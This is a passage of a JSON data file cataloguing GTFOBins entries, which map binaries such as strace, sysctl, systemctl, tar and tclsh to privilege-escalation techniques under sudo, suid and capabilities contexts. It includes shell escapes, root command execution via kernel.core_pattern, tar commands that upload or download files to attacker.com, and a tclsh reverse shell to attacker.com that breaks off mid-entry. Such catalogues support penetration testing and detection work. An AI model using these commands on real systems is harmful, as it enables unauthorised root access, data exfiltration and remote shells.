/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/stdbuf/"]},{"id":"gtfo:stdbuf:shell:0:suid","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/stdbuf/"]},{"id":"gtfo:stdbuf:shell:0:unprivileged","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/stdbuf/"]},{"id":"gtfo:strace:file-write:0:sudo","toolId":"gtfo:strace","toolName":"strace","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"strace -s 999 -o /path/to/output-file strace - DATA","description":"The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strace:file-write:0:unprivileged","toolId":"gtfo:strace","toolName":"strace","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"strace -s 999 -o /path/to/output-file strace - DATA","description":"The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strace:shell:0:sudo","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strace:shell:0:suid","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strace:shell:0:unprivileged","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strace/"]},{"id":"gtfo:strings:file-read:0:sudo","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strings/"]},{"id":"gtfo:strings:file-read:0:suid","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/strings/"]},{"id":"gtfo:strings:file-read:0:unprivileged","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strings/"]},{"id":"gtfo:su:shell:0:sudo","toolId":"gtfo:su","toolName":"su","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"su -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/su/"]},{"id":"gtfo:sudo:shell:0:sudo","toolId":"gtfo:sudo","toolName":"sudo","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sudo /bin/sh","description":"The invocation is actually `sudo sudo ...`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sudo/"]},{"id":"gtfo:sysctl:command:0:sudo","toolId":"gtfo:sysctl","toolName":"sysctl","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sysctl 'kernel.core_pattern=|/path/to/command'","description":"The command is executed by `root` in the background when a core dump occurs.\n\nTo trigger a core dump, send the `SIGQUIT` signal to a process, for example:\n\n```\nsleep infinity &\nkill -QUIT $!\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:sysctl:command:0:suid","toolId":"gtfo:sysctl","toolName":"sysctl","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sysctl 'kernel.core_pattern=|/path/to/command'","description":"The command is executed by `root` in the background when a core dump occurs.\n\nTo trigger a core dump, send the `SIGQUIT` signal to a process, for example:\n\n```\nsleep infinity &\nkill -QUIT $!\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:sysctl:file-read:0:sudo","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:sysctl:file-read:0:suid","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:sysctl:file-read:0:unprivileged","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sysctl/"]},{"id":"gtfo:systemctl:inherit:0:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:inherit:0:suid","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:inherit:0:unprivileged","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:shell:0:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[Service]\nType=oneshot\nExecStart=/path/to/command\n[Install]\nWantedBy=multi-user.target' >/path/to/temp-file.service\nsystemctl link /path/to/temp-file.service\nsystemctl enable --now /path/to/temp-file.service","description":"It might happen that the service is not started with `--now`, in such cases it might be necessary to manually start it.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:shell:0:suid","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[Service]\nType=oneshot\nExecStart=/path/to/command\n[Install]\nWantedBy=multi-user.target' >/path/to/temp-file.service\nsystemctl link /path/to/temp-file.service\nsystemctl enable --now /path/to/temp-file.service","description":"It might happen that the service is not started with `--now`, in such cases it might be necessary to manually start it.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemctl:shell:1:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\nSYSTEMD_EDITOR=/path/to/temp-file systemctl edit basic.target","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"]},{"id":"gtfo:systemd-resolve:inherit:0:sudo","toolId":"gtfo:systemd-resolve","toolName":"systemd-resolve","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemd-resolve --status","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-resolve/"]},{"id":"gtfo:systemd-run:command:0:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"systemd-run /path/to/command","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"]},{"id":"gtfo:systemd-run:shell:0:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"systemd-run -S","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"]},{"id":"gtfo:systemd-run:shell:1:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"systemd-run -t /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"]},{"id":"gtfo:tac:file-read:0:sudo","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tac/"]},{"id":"gtfo:tac:file-read:0:suid","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tac/"]},{"id":"gtfo:tac:file-read:0:unprivileged","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tac/"]},{"id":"gtfo:tail:file-read:0:sudo","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tail/"]},{"id":"gtfo:tail:file-read:0:suid","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tail/"]},{"id":"gtfo:tail:file-read:0:unprivileged","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tail/"]},{"id":"gtfo:tailscale:upload:0:sudo","toolId":"gtfo:tailscale","toolName":"tailscale","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tailscale serve --http=12345 /path/to/input-file","description":"The URL is reachable by any host of the same Tailnet.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tailscale/"]},{"id":"gtfo:tar:download:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:download:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:download:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-read:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-read:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-read:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tar cf /dev/stdout /path/to/input-file -I 'tar xO'","description":"The file is read then passed to the specified command (e.g., `tar xO`) via standard input.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-write:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-write:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:file-write:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:1:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:1:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:1:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tar xf /dev/null -I '/bin/sh -c \"/bin/sh 0<&2 1>&2\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:2:sudo","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:2:suid","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:shell:2:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 0<&1' >/path/to/temp-file\ntar cf /path/to/temp-file.tar /path/to/temp-file\ntar xf /path/to/temp-file.tar --to-command /bin/sh","description":"The archive can also be prepared offline then uploaded to the target.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:upload:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:upload:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:tar:upload:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"]},{"id":"gtfo:task:shell:0:sudo","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/task/"]},{"id":"gtfo:task:shell:0:suid","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/task/"]},{"id":"gtfo:task:shell:0:unprivileged","toolId":"gtfo:task","toolName":"task","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"task execute /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/task/"]},{"id":"gtfo:taskset:shell:0:sudo","toolId":"gtfo:taskset","toolName":"taskset","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"taskset 1 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/taskset/"]},{"id":"gtfo:taskset:shell:0:unprivileged","toolId":"gtfo:taskset","toolName":"taskset","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"taskset 1 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/taskset/"]},{"id":"gtfo:tasksh:shell:0:sudo","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tasksh/"]},{"id":"gtfo:tasksh:shell:0:suid","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tasksh/"]},{"id":"gtfo:tasksh:shell:0:unprivileged","toolId":"gtfo:tasksh","toolName":"tasksh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tasksh\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tasksh/"]},{"id":"gtfo:tbl:file-read:0:sudo","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tbl/"]},{"id":"gtfo:tbl:file-read:0:suid","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tbl/"]},{"id":"gtfo:tbl:file-read:0:unprivileged","toolId":"gtfo:tbl","toolName":"tbl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tbl /path/to/input-file","description":"The read file content is corrupted by additional text at the beginning.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tbl/"]},{"id":"gtfo:tclsh:library-load:0:capabilities","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:library-load:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:library-load:0:suid","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:library-load:0:unprivileged","toolId":"gtfo:tclsh","toolName":"tclsh","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"tclsh\nload /path/to/lib.so x","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tclsh/"]},{"id":"gtfo:tclsh:reverse-shell:0:sudo","toolId":"gtfo:tclsh","toolName":"tclsh","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"tclsh\nset s [socket attacker.com 12345];while 1 { puts -nonewline $s \"> \";flush $s;gets 